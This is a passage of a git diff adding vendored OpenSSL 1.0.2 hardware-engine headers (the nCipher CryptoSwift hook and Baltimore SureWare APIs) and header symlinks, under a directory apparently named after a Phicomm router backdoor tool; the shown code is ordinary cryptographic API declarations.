+ * advised of the possibility of damage.  In any event, if the
+ * exclusion of liability is not effective, the liability of nCipher
+ * or any author or distributor shall be limited to the lesser of the
+ * price paid and 1,000 pounds sterling. This licence only fails to
+ * exclude or limit liability for death or personal injury arising out
+ * of negligence, and only to the extent that such an exclusion or
+ * limitation is not effective.
+ *
+ * NCIPHER AND THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ALL
+ * AND ANY WARRANTIES (WHETHER EXPRESS OR IMPLIED), including, but not
+ * limited to, any implied warranties of merchantability, fitness for
+ * a particular purpose, satisfactory quality, and/or non-infringement
+ * of any third party rights.
+ *
+ * US Government use: This software and documentation is Commercial
+ * Computer Software and Computer Software Documentation, as defined in
+ * sub-paragraphs (a)(1) and (a)(5) of DFAR 252.227-7014, "Rights in
+ * Noncommercial Computer Software and Noncommercial Computer Software
+ * Documentation."  Use, duplication or disclosure by the Government is
+ * subject to the terms and conditions specified here.
+ *
+ * By using or distributing this file you will be accepting these
+ * terms and conditions, including the limitation of liability and
+ * lack of warranty.  If you do not wish to accept these terms and
+ * conditions, DO NOT USE THE FILE.
+ *
+ *
+ * The actual dynamically loadable plugin, and the library files for
+ * static linking, which are also provided in some distributions, are
+ * not covered by the licence described above.  You should have
+ * received a separate licence with terms and conditions for these
+ * library files; if you received the library files without a licence,
+ * please contact nCipher.
+ *
+ *
+ * $Id: hwcryptohook.h,v 1.1 2002/10/11 17:10:59 levitte Exp $
+ */
+
+#ifndef HWCRYPTOHOOK_H
+# define HWCRYPTOHOOK_H
+
+# include <sys/types.h>
+# include <stdio.h>
+
+# ifndef HWCRYPTOHOOK_DECLARE_APPTYPES
+#  define HWCRYPTOHOOK_DECLARE_APPTYPES 1
+# endif
+
+# define HWCRYPTOHOOK_ERROR_FAILED   -1
+# define HWCRYPTOHOOK_ERROR_FALLBACK -2
+# define HWCRYPTOHOOK_ERROR_MPISIZE  -3
+
+# if HWCRYPTOHOOK_DECLARE_APPTYPES
+
+/*-
+ * These structs are defined by the application and opaque to the
+ * crypto plugin.  The application may define these as it sees fit.
+ * Default declarations are provided here, but the application may
+ *  #define HWCRYPTOHOOK_DECLARE_APPTYPES 0
+ * to prevent these declarations, and instead provide its own
+ * declarations of these types.  (Pointers to them must still be
+ * ordinary pointers to structs or unions, or the resulting combined
+ * program will have a type inconsistency.)
+ */
+typedef struct HWCryptoHook_MutexValue HWCryptoHook_Mutex;
+typedef struct HWCryptoHook_CondVarValue HWCryptoHook_CondVar;
+typedef struct HWCryptoHook_PassphraseContextValue
+ HWCryptoHook_PassphraseContext;
+typedef struct HWCryptoHook_CallerContextValue HWCryptoHook_CallerContext;
+
+# endif                         /* HWCRYPTOHOOK_DECLARE_APPTYPES */
+
+/*-
+ * These next two structs are opaque to the application.  The crypto
+ * plugin will return pointers to them; the caller simply manipulates
+ * the pointers.
+ */
+typedef struct HWCryptoHook_Context *HWCryptoHook_ContextHandle;
+typedef struct HWCryptoHook_RSAKey *HWCryptoHook_RSAKeyHandle;
+
+typedef struct {
+    char *buf;
+    size_t size;
+} HWCryptoHook_ErrMsgBuf;
+/*-
+ * Used for error reporting.  When a HWCryptoHook function fails it
+ * will return a sentinel value (0 for pointer-valued functions, or a
+ * negative number, usually HWCRYPTOHOOK_ERROR_FAILED, for
+ * integer-valued ones).  It will, if an ErrMsgBuf is passed, also put
+ * an error message there.
+ *
+ * size is the size of the buffer, and will not be modified.  If you
+ * pass 0 for size you must pass 0 for buf, and nothing will be
+ * recorded (just as if you passed 0 for the struct pointer).
+ * Messages written to the buffer will always be null-terminated, even
+ * when truncated to fit within size bytes.
+ *
+ * The contents of the buffer are not defined if there is no error.
+ */
+
+typedef struct HWCryptoHook_MPIStruct {
+    unsigned char *buf;
+    size_t size;
+} HWCryptoHook_MPI;
+/*-
+ * When one of these is returned, a pointer is passed to the function.
+ * At call, size is the space available.  Afterwards it is updated to
+ * be set to the actual length (which may be more than the space available,
+ * if there was not enough room and the result was truncated).
+ * buf (the pointer) is not updated.
+ *
+ * size is in bytes and may be zero at call or return, but must be a
+ * multiple of the limb size.  Zero limbs at the MS end are not
+ * permitted.
+ */
+
+# define HWCryptoHook_InitFlags_FallbackModExp    0x0002UL
+# define HWCryptoHook_InitFlags_FallbackRSAImmed  0x0004UL
+/*-
+ * Enable requesting fallback to software in case of problems with the
+ * hardware support.  This indicates to the crypto provider that the
+ * application is prepared to fall back to software operation if the
+ * ModExp* or RSAImmed* functions return HWCRYPTOHOOK_ERROR_FALLBACK.
+ * Without this flag those calls will never return
+ * HWCRYPTOHOOK_ERROR_FALLBACK.  The flag will also cause the crypto
+ * provider to avoid repeatedly attempting to contact dead hardware
+ * within a short interval, if appropriate.
+ */
+
+# define HWCryptoHook_InitFlags_SimpleForkCheck   0x0010UL
+/*-
+ * Without _SimpleForkCheck the library is allowed to assume that the
+ * application will not fork and call the library in the child(ren).
+ *
+ * When it is specified, this is allowed.  However, after a fork
+ * neither parent nor child may unload any loaded keys or call
+ * _Finish.  Instead, they should call exit (or die with a signal)
+ * without calling _Finish.  After all the children have died the
+ * parent may unload keys or call _Finish.
+ *
+ * This flag only has any effect on UN*X platforms.
+ */
+
+typedef struct {
+    unsigned long flags;
+    void *logstream;            /* usually a FILE*.  See below. */
+    size_t limbsize;            /* bignum format - size of radix type, must
+                                 * be power of 2 */
+    int mslimbfirst;            /* 0 or 1 */
+    int msbytefirst;            /* 0 or 1; -1 = native */
+  /*-
+   * All the callback functions should return 0 on success, or a
+   * nonzero integer (whose value will be visible in the error message
+   * put in the buffer passed to the call).
+   *
+   * If a callback is not available pass a null function pointer.
+   *
+   * The callbacks may not call down again into the crypto plugin.
+   */
+  /*-
+   * For thread-safety.  Set everything to 0 if you promise only to be
+   * singlethreaded.  maxsimultaneous is the number of calls to
+   * ModExp[Crt]/RSAImmed{Priv,Pub}/RSA.  If you don't know what to
+   * put there then say 0 and the hook library will use a default.
+   *
+   * maxmutexes is a small limit on the number of simultaneous mutexes
+   * which will be requested by the library.  If there is no small
+   * limit, set it to 0.  If the crypto plugin cannot create the
+   * advertised number of mutexes the calls to its functions may fail.
+   * If a low number of mutexes is advertised the plugin will try to
+   * do the best it can.  Making larger numbers of mutexes available
+   * may improve performance and parallelism by reducing contention
+   * over critical sections.  Unavailability of any mutexes, implying
+   * single-threaded operation, should be indicated by the setting
+   * mutex_init et al to 0.
+   */
+    int maxmutexes;
+    int maxsimultaneous;
+    size_t mutexsize;
+    int (*mutex_init) (HWCryptoHook_Mutex *,
+                       HWCryptoHook_CallerContext * cactx);
+    int (*mutex_acquire) (HWCryptoHook_Mutex *);
+    void (*mutex_release) (HWCryptoHook_Mutex *);
+    void (*mutex_destroy) (HWCryptoHook_Mutex *);
+    /*-
+     * For greater efficiency, can use condition vars internally for
+     * synchronisation.  In this case maxsimultaneous is ignored, but
+     * the other mutex stuff must be available.  In singlethreaded
+     * programs, set everything to 0.
+     */
+    size_t condvarsize;
+    int (*condvar_init) (HWCryptoHook_CondVar *,
+                         HWCryptoHook_CallerContext * cactx);
+    int (*condvar_wait) (HWCryptoHook_CondVar *, HWCryptoHook_Mutex *);
+    void (*condvar_signal) (HWCryptoHook_CondVar *);
+    void (*condvar_broadcast) (HWCryptoHook_CondVar *);
+    void (*condvar_destroy) (HWCryptoHook_CondVar *);
+    /*-
+     * The semantics of acquiring and releasing mutexes and broadcasting
+     * and waiting on condition variables are expected to be those from
+     * POSIX threads (pthreads).  The mutexes may be (in pthread-speak)
+     * fast mutexes, recursive mutexes, or nonrecursive ones.
+     *
+     * The _release/_signal/_broadcast and _destroy functions must
+     * always succeed when given a valid argument; if they are given an
+     * invalid argument then the program (crypto plugin + application)
+     * has an internal error, and they should abort the program.
+     */
+    int (*getpassphrase) (const char *prompt_info,
+                          int *len_io, char *buf,
+                          HWCryptoHook_PassphraseContext * ppctx,
+                          HWCryptoHook_CallerContext * cactx);
+    /*-
+     * Passphrases and the prompt_info, if they contain high-bit-set
+     * characters, are UTF-8.  The prompt_info may be a null pointer if
+     * no prompt information is available (it should not be an empty
+     * string).  It will not contain text like `enter passphrase';
+     * instead it might say something like `Operator Card for John
+     * Smith' or `SmartCard in nFast Module #1, Slot #1'.
+     *
+     * buf points to a buffer in which to return the passphrase; on
+     * entry *len_io is the length of the buffer.  It should be updated
+     * by the callback.  The returned passphrase should not be
+     * null-terminated by the callback.
+     */
+    int (*getphystoken) (const char *prompt_info,
+                         const char *wrong_info,
+                         HWCryptoHook_PassphraseContext * ppctx,
+                         HWCryptoHook_CallerContext * cactx);
+    /*-
+     * Requests that the human user physically insert a different
+     * smartcard, DataKey, etc.  The plugin should check whether the
+     * currently inserted token(s) are appropriate, and if they are it
+     * should not make this call.
+     *
+     * prompt_info is as before.  wrong_info is a description of the
+     * currently inserted token(s) so that the user is told what
+     * something is.  wrong_info, like prompt_info, may be null, but
+     * should not be an empty string.  Its contents should be
+     * syntactically similar to that of prompt_info.
+     */
+    /*-
+     * Note that a single LoadKey operation might cause several calls to
+     * getpassphrase and/or requestphystoken.  If requestphystoken is
+     * not provided (ie, a null pointer is passed) then the plugin may
+     * not support loading keys for which authorisation by several cards
+     * is required.  If getpassphrase is not provided then cards with
+     * passphrases may not be supported.
+     *
+     * getpassphrase and getphystoken do not need to check that the
+     * passphrase has been entered correctly or the correct token
+     * inserted; the crypto plugin will do that.  If this is not the
+     * case then the crypto plugin is responsible for calling these
+     * routines again as appropriate until the correct token(s) and
+     * passphrase(s) are supplied as required, or until any retry limits
+     * implemented by the crypto plugin are reached.
+     *
+     * In either case, the application must allow the user to say `no'
+     * or `cancel' to indicate that they do not know the passphrase or
+     * have the appropriate token; this should cause the callback to
+     * return nonzero indicating error.
+     */
+    void (*logmessage) (void *logstream, const char *message);
+    /*-
+     * A log message will be generated at least every time something goes
+     * wrong and an ErrMsgBuf is filled in (or would be if one was
+     * provided).  Other diagnostic information may be written there too,
+     * including more detailed reasons for errors which are reported in an
+     * ErrMsgBuf.
+     *
+     * When a log message is generated, this callback is called.  It
+     * should write a message to the relevant logging arrangements.
+     *
+     * The message string passed will be null-terminated and may be of arbitrary
+     * length.  It will not be prefixed by the time and date, nor by the
+     * name of the library that is generating it - if this is required,
+     * the logmessage callback must do it.  The message will not have a
+     * trailing newline (though it may contain internal newlines).
+     *
+     * If a null pointer is passed for logmessage a default function is
+     * used.  The default function treats logstream as a FILE* which has
+     * been converted to a void*.  If logstream is 0 it does nothing.
+     * Otherwise it prepends the date and time and library name and
+     * writes the message to logstream.  Each line will be prefixed by a
+     * descriptive string containing the date, time and identity of the
+     * crypto plugin.  Errors on the logstream are not reported
+     * anywhere, and the default function doesn't flush the stream, so
+     * the application must set the buffering how it wants it.
+     *
+     * The crypto plugin may also provide a facility to have copies of
+     * log messages sent elsewhere, and or for adjusting the verbosity
+     * of the log messages; any such facilities will be configured by
+     * external means.
+     */
+} HWCryptoHook_InitInfo;
+
+typedef
+HWCryptoHook_ContextHandle HWCryptoHook_Init_t(const HWCryptoHook_InitInfo *
+                                               initinfo, size_t initinfosize,
+                                               const HWCryptoHook_ErrMsgBuf *
+                                               errors,
+                                               HWCryptoHook_CallerContext *
+                                               cactx);
+extern HWCryptoHook_Init_t HWCryptoHook_Init;
+
+/*-
+ * Caller should set initinfosize to the size of the HWCryptoHook struct,
+ * so it can be extended later.
+ *
+ * On success, a message for display or logging by the server,
+ * including the name and version number of the plugin, will be filled
+ * in into *errors; on failure *errors is used for error handling, as
+ * usual.
+ */
+
+/*-
+ * All these functions return 0 on success, HWCRYPTOHOOK_ERROR_FAILED
+ * on most failures.  HWCRYPTOHOOK_ERROR_MPISIZE means at least one of
+ * the output MPI buffer(s) was too small; the sizes of all have been
+ * set to the desired size (and for those where the buffer was large
+ * enough, the value may have been copied in), and no error message
+ * has been recorded.
+ *
+ * You may pass 0 for the errors struct.  In any case, unless you set
+ * _NoStderr at init time then messages may be reported to stderr.
+ */
+
+/*-
+ * The RSAImmed* functions (and key managed RSA) only work with
+ * modules which have an RSA patent licence - currently that means KM
+ * units; the ModExp* ones work with all modules, so you need a patent
+ * licence in the software in the US.  They are otherwise identical.
+ */
+
+typedef
+void HWCryptoHook_Finish_t(HWCryptoHook_ContextHandle hwctx);
+extern HWCryptoHook_Finish_t HWCryptoHook_Finish;
+/* You must not have any calls going or keys loaded when you call this. */
+
+typedef
+int HWCryptoHook_RandomBytes_t(HWCryptoHook_ContextHandle hwctx,
+                               unsigned char *buf, size_t len,
+                               const HWCryptoHook_ErrMsgBuf * errors);
+extern HWCryptoHook_RandomBytes_t HWCryptoHook_RandomBytes;
+
+typedef
+int HWCryptoHook_ModExp_t(HWCryptoHook_ContextHandle hwctx,
+                          HWCryptoHook_MPI a,
+                          HWCryptoHook_MPI p,
+                          HWCryptoHook_MPI n,
+                          HWCryptoHook_MPI * r,
+                          const HWCryptoHook_ErrMsgBuf * errors);
+extern HWCryptoHook_ModExp_t HWCryptoHook_ModExp;
+
+typedef
+int HWCryptoHook_RSAImmedPub_t(HWCryptoHook_ContextHandle hwctx,
+                               HWCryptoHook_MPI m,
+                               HWCryptoHook_MPI e,
+                               HWCryptoHook_MPI n,
+                               HWCryptoHook_MPI * r,
+                               const HWCryptoHook_ErrMsgBuf * errors);
+extern HWCryptoHook_RSAImmedPub_t HWCryptoHook_RSAImmedPub;
+
+typedef
+int HWCryptoHook_ModExpCRT_t(HWCryptoHook_ContextHandle hwctx,
+                             HWCryptoHook_MPI a,
+                             HWCryptoHook_MPI p,
+                             HWCryptoHook_MPI q,
+                             HWCryptoHook_MPI dmp1,
+                             HWCryptoHook_MPI dmq1,
+                             HWCryptoHook_MPI iqmp,
+                             HWCryptoHook_MPI * r,
+                             const HWCryptoHook_ErrMsgBuf * errors);
+extern HWCryptoHook_ModExpCRT_t HWCryptoHook_ModExpCRT;
+
+typedef
+int HWCryptoHook_RSAImmedPriv_t(HWCryptoHook_ContextHandle hwctx,
+                                HWCryptoHook_MPI m,
+                                HWCryptoHook_MPI p,
+                                HWCryptoHook_MPI q,
+                                HWCryptoHook_MPI dmp1,
+                                HWCryptoHook_MPI dmq1,
+                                HWCryptoHook_MPI iqmp,
+                                HWCryptoHook_MPI * r,
+                                const HWCryptoHook_ErrMsgBuf * errors);
+extern HWCryptoHook_RSAImmedPriv_t HWCryptoHook_RSAImmedPriv;
+
+/*-
+ * The RSAImmed* and ModExp* functions may return E_FAILED or
+ * E_FALLBACK for failure.
+ *
+ * E_FAILED means the failure is permanent and definite and there
+ *    should be no attempt to fall back to software.  (Eg, for some
+ *    applications, which support only the acceleration-only
+ *    functions, the `key material' may actually be an encoded key
+ *    identifier, and doing the operation in software would give wrong
+ *    answers.)
+ *
+ * E_FALLBACK means that doing the computation in software would seem
+ *    reasonable.  If an application pays attention to this and is
+ *    able to fall back, it should also set the Fallback init flags.
+ */
+
+typedef
+int HWCryptoHook_RSALoadKey_t(HWCryptoHook_ContextHandle hwctx,
+                              const char *key_ident,
+                              HWCryptoHook_RSAKeyHandle * keyhandle_r,
+                              const HWCryptoHook_ErrMsgBuf * errors,
+                              HWCryptoHook_PassphraseContext * ppctx);
+extern HWCryptoHook_RSALoadKey_t HWCryptoHook_RSALoadKey;
+/*-
+ * The key_ident is a null-terminated string configured by the
+ * user via the application's usual configuration mechanisms.
+ * It is provided to the user by the crypto provider's key management
+ * system.  The user must be able to enter at least any string of between
+ * 1 and 1023 characters inclusive, consisting of printable 7-bit
+ * ASCII characters.  The provider should avoid using
+ * any characters except alphanumerics and the punctuation
+ * characters  _ - + . / @ ~  (the user is expected to be able
+ * to enter these without quoting).  The string may be case-sensitive.
+ * The application may allow the user to enter other NULL-terminated strings,
+ * and the provider must cope (returning an error if the string is not
+ * valid).
+ *
+ * If the key does not exist, no error is recorded and 0 is returned;
+ * keyhandle_r will be set to 0 instead of to a key handle.
+ */
+
+typedef
+int HWCryptoHook_RSAGetPublicKey_t(HWCryptoHook_RSAKeyHandle k,
+                                   HWCryptoHook_MPI * n,
+                                   HWCryptoHook_MPI * e,
+                                   const HWCryptoHook_ErrMsgBuf * errors);
+extern HWCryptoHook_RSAGetPublicKey_t HWCryptoHook_RSAGetPublicKey;
+/*-
+ * The crypto plugin will not store certificates.
+ *
+ * Although this function for acquiring the public key value is
+ * provided, it is not the purpose of this API to deal fully with the
+ * handling of the public key.
+ *
+ * It is expected that the crypto supplier's key generation program
+ * will provide general facilities for producing X.509
+ * self-certificates and certificate requests in PEM format.  These
+ * will be given to the user so that they can configure them in the
+ * application, send them to CAs, or whatever.
+ *
+ * In case this kind of certificate handling is not appropriate, the
+ * crypto supplier's key generation program should be able to be
+ * configured not to generate such a self-certificate or certificate
+ * request.  Then the application will need to do all of this, and
+ * will need to store and handle the public key and certificates
+ * itself.
+ */
+
+typedef
+int HWCryptoHook_RSAUnloadKey_t(HWCryptoHook_RSAKeyHandle k,
+                                const HWCryptoHook_ErrMsgBuf * errors);
+extern HWCryptoHook_RSAUnloadKey_t HWCryptoHook_RSAUnloadKey;
+/* Might fail due to locking problems, or other serious internal problems. */
+
+typedef
+int HWCryptoHook_RSA_t(HWCryptoHook_MPI m,
+                       HWCryptoHook_RSAKeyHandle k,
+                       HWCryptoHook_MPI * r,
+                       const HWCryptoHook_ErrMsgBuf * errors);
+extern HWCryptoHook_RSA_t HWCryptoHook_RSA;
+/* RSA private key operation (sign or decrypt) - raw, unpadded. */
+
+#endif                          /* HWCRYPTOHOOK_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/sureware.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/sureware.h
new file mode 100644
index 0000000..b1423e1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vendor_defns/sureware.h
@@ -0,0 +1,250 @@
+/*-
+ * Written by Corinne Dive-Reclus(cdive@baltimore.com)
+ *
+ * Copyright@2001 Baltimore Technologies Ltd.
+ *
+ * THIS FILE IS PROVIDED BY BALTIMORE TECHNOLOGIES ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL BALTIMORE TECHNOLOGIES BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#ifdef WIN32
+# define SW_EXPORT       __declspec ( dllexport )
+#else
+# define SW_EXPORT
+#endif
+
+/*
+ *       List of exposed SureWare errors
+ */
+#define SUREWAREHOOK_ERROR_FAILED               -1
+#define SUREWAREHOOK_ERROR_FALLBACK             -2
+#define SUREWAREHOOK_ERROR_UNIT_FAILURE -3
+#define SUREWAREHOOK_ERROR_DATA_SIZE -4
+#define SUREWAREHOOK_ERROR_INVALID_PAD -5
+/*-
+* -----------------WARNING-----------------------------------
+* In all the following functions:
+* msg is a string with at least 24 bytes free.
+* A 24 bytes string will be concatenated to the existing content of msg.
+*/
+/*-
+*       SureWare Initialisation function
+*       in param threadsafe, if !=0, thread safe enabled
+*       return SureWareHOOK_ERROR_UNIT_FAILURE if failure, 1 if success
+*/
+typedef int SureWareHook_Init_t(char *const msg, int threadsafe);
+extern SW_EXPORT SureWareHook_Init_t SureWareHook_Init;
+/*-
+*       SureWare Finish function
+*/
+typedef void SureWareHook_Finish_t(void);
+extern SW_EXPORT SureWareHook_Finish_t SureWareHook_Finish;
+/*-
+*        PRE_CONDITION:
+*               DO NOT CALL ANY OF THE FOLLOWING FUNCTIONS IN CASE OF INIT FAILURE
+*/
+/*-
+*       SureWare RAND Bytes function
+*       In case of failure, the content of buf is unpredictable.
+*       return 1 if success
+*                       SureWareHOOK_ERROR_FALLBACK if function not available in hardware
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*                       SureWareHOOK_ERROR_UNIT_FAILURE if hardware failure
+*                       SUREWAREHOOK_ERROR_DATA_SIZE wrong size for buf
+*
+*       in/out param buf : a num bytes long buffer where random bytes will be put
+*       in param num : the number of bytes into buf
+*/
+typedef int SureWareHook_Rand_Bytes_t(char *const msg, unsigned char *buf,
+                                      int num);
+extern SW_EXPORT SureWareHook_Rand_Bytes_t SureWareHook_Rand_Bytes;
+
+/*-
+*       SureWare RAND Seed function
+*       Adds some seed to the Hardware Random Number Generator
+*       return 1 if success
+*                       SureWareHOOK_ERROR_FALLBACK if function not available in hardware
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*                       SureWareHOOK_ERROR_UNIT_FAILURE if hardware failure
+*                       SUREWAREHOOK_ERROR_DATA_SIZE wrong size for buf
+*
+*       in param buf : the seed to add into the HRNG
+*       in param num : the number of bytes into buf
+*/
+typedef int SureWareHook_Rand_Seed_t(char *const msg, const void *buf,
+                                     int num);
+extern SW_EXPORT SureWareHook_Rand_Seed_t SureWareHook_Rand_Seed;
+
+/*-
+*       SureWare Load Private Key function
+*       return 1 if success
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*       No hardware is contact for this function.
+*
+*       in param key_id :the name of the private protected key file without the extension
+                                                ".sws"
+*       out param hptr : a pointer to a buffer allocated by SureWare_Hook
+*       out param num: the effective key length in bytes
+*       out param keytype: 1 if RSA 2 if DSA
+*/
+typedef int SureWareHook_Load_Privkey_t(char *const msg, const char *key_id,
+                                        char **hptr, unsigned long *num,
+                                        char *keytype);
+extern SW_EXPORT SureWareHook_Load_Privkey_t SureWareHook_Load_Privkey;
+
+/*-
+*       SureWare Info Public Key function
+*       return 1 if success
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*       No hardware is contact for this function.
+*
+*       in param key_id :the name of the private protected key file without the extension
+                                                ".swp"
+*       out param hptr : a pointer to a buffer allocated by SureWare_Hook
+*       out param num: the effective key length in bytes
+*       out param keytype: 1 if RSA 2 if DSA
+*/
+typedef int SureWareHook_Info_Pubkey_t(char *const msg, const char *key_id,
+                                       unsigned long *num, char *keytype);
+extern SW_EXPORT SureWareHook_Info_Pubkey_t SureWareHook_Info_Pubkey;
+
+/*-
+*       SureWare Load Public Key function
+*       return 1 if success
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*       No hardware is contact for this function.
+*
+*       in param key_id :the name of the public protected key file without the extension
+                                                ".swp"
+*       in param num : the bytes size of n and e
+*       out param n: where to write modulus in bn format
+*       out param e: where to write exponent in bn format
+*/
+typedef int SureWareHook_Load_Rsa_Pubkey_t(char *const msg,
+                                           const char *key_id,
+                                           unsigned long num,
+                                           unsigned long *n,
+                                           unsigned long *e);
+extern SW_EXPORT SureWareHook_Load_Rsa_Pubkey_t SureWareHook_Load_Rsa_Pubkey;
+
+/*-
+*       SureWare Load DSA Public Key function
+*       return 1 if success
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*       No hardware is contact for this function.
+*
+*       in param key_id :the name of the public protected key file without the extension
+                                                ".swp"
+*       in param num : the bytes size of n and e
+*       out param pub: where to write pub key in bn format
+*       out param p: where to write prime in bn format
+*       out param q: where to write sunprime (length 20 bytes) in bn format
+*       out param g: where to write base in bn format
+*/
+typedef int SureWareHook_Load_Dsa_Pubkey_t(char *const msg,
+                                           const char *key_id,
+                                           unsigned long num,
+                                           unsigned long *pub,
+                                           unsigned long *p, unsigned long *q,
+                                           unsigned long *g);
+extern SW_EXPORT SureWareHook_Load_Dsa_Pubkey_t SureWareHook_Load_Dsa_Pubkey;
+
+/*-
+*       SureWare Free function
+*       Destroy the key into the hardware if destroy==1
+*/
+typedef void SureWareHook_Free_t(char *p, int destroy);
+extern SW_EXPORT SureWareHook_Free_t SureWareHook_Free;
+
+#define SUREWARE_PKCS1_PAD 1
+#define SUREWARE_ISO9796_PAD 2
+#define SUREWARE_NO_PAD 0
+/*-
+* SureWare RSA Private Decryption
+* return 1 if success
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*                       SureWareHOOK_ERROR_UNIT_FAILURE if hardware failure
+*                       SUREWAREHOOK_ERROR_DATA_SIZE wrong size for buf
+*
+*       in param flen : byte size of from and to
+*       in param from : encrypted data buffer, should be a not-null valid pointer
+*       out param tlen: byte size of decrypted data, if error, unexpected value
+*       out param to : decrypted data buffer, should be a not-null valid pointer
+*   in param prsa: a protected key pointer, should be a not-null valid pointer
+*   int padding: padding id as follow
+*                                       SUREWARE_PKCS1_PAD
+*                                       SUREWARE_NO_PAD
+*
+*/
+typedef int SureWareHook_Rsa_Priv_Dec_t(char *const msg, int flen,
+                                        unsigned char *from, int *tlen,
+                                        unsigned char *to, char *prsa,
+                                        int padding);
+extern SW_EXPORT SureWareHook_Rsa_Priv_Dec_t SureWareHook_Rsa_Priv_Dec;
+/*-
+* SureWare RSA Signature
+* return 1 if success
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*                       SureWareHOOK_ERROR_UNIT_FAILURE if hardware failure
+*                       SUREWAREHOOK_ERROR_DATA_SIZE wrong size for buf
+*
+*       in param flen : byte size of from and to
+*       in param from : encrypted data buffer, should be a not-null valid pointer
+*       out param tlen: byte size of decrypted data, if error, unexpected value
+*       out param to : decrypted data buffer, should be a not-null valid pointer
+*   in param prsa: a protected key pointer, should be a not-null valid pointer
+*   int padding: padding id as follow
+*                                       SUREWARE_PKCS1_PAD
+*                                       SUREWARE_ISO9796_PAD
+*
+*/
+typedef int SureWareHook_Rsa_Sign_t(char *const msg, int flen,
+                                    unsigned char *from, int *tlen,
+                                    unsigned char *to, char *prsa,
+                                    int padding);
+extern SW_EXPORT SureWareHook_Rsa_Sign_t SureWareHook_Rsa_Sign;
+/*-
+* SureWare DSA Signature
+* return 1 if success
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*                       SureWareHOOK_ERROR_UNIT_FAILURE if hardware failure
+*                       SUREWAREHOOK_ERROR_DATA_SIZE wrong size for buf
+*
+*       in param flen : byte size of from and to
+*       in param from : encrypted data buffer, should be a not-null valid pointer
+*       out param to : decrypted data buffer, should be a 40bytes valid pointer
+*   in param pdsa: a protected key pointer, should be a not-null valid pointer
+*
+*/
+typedef int SureWareHook_Dsa_Sign_t(char *const msg, int flen,
+                                    const unsigned char *from,
+                                    unsigned long *r, unsigned long *s,
+                                    char *pdsa);
+extern SW_EXPORT SureWareHook_Dsa_Sign_t SureWareHook_Dsa_Sign;
+
+/*-
+* SureWare Mod Exp
+* return 1 if success
+*                       SureWareHOOK_ERROR_FAILED if error while processing
+*                       SureWareHOOK_ERROR_UNIT_FAILURE if hardware failure
+*                       SUREWAREHOOK_ERROR_DATA_SIZE wrong size for buf
+*
+*       mod and res are mlen bytes long.
+*       exp is elen bytes long
+*       data is dlen bytes long
+*       mlen,elen and dlen are all multiple of sizeof(unsigned long)
+*/
+typedef int SureWareHook_Mod_Exp_t(char *const msg, int mlen,
+                                   const unsigned long *mod, int elen,
+                                   const unsigned long *exponent, int dlen,
+                                   unsigned long *data, unsigned long *res);
+extern SW_EXPORT SureWareHook_Mod_Exp_t SureWareHook_Mod_Exp;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/aes.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/aes.h
new file mode 120000
index 0000000..f555c13
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/aes.h
@@ -0,0 +1 @@
+../../crypto/aes/aes.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/asn1.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/asn1.h
new file mode 120000
index 0000000..dd51495
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/asn1.h
@@ -0,0 +1 @@
+../../crypto/asn1/asn1.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/asn1_mac.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/asn1_mac.h
new file mode 120000
index 0000000..97781d9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/asn1_mac.h
@@ -0,0 +1 @@
+../../crypto/asn1/asn1_mac.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/asn1t.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/asn1t.h
new file mode 120000
index 0000000..31c87c3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/asn1t.h
@@ -0,0 +1 @@
+../../crypto/asn1/asn1t.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/bio.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/bio.h
new file mode 120000
index 0000000..c598b6f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/bio.h
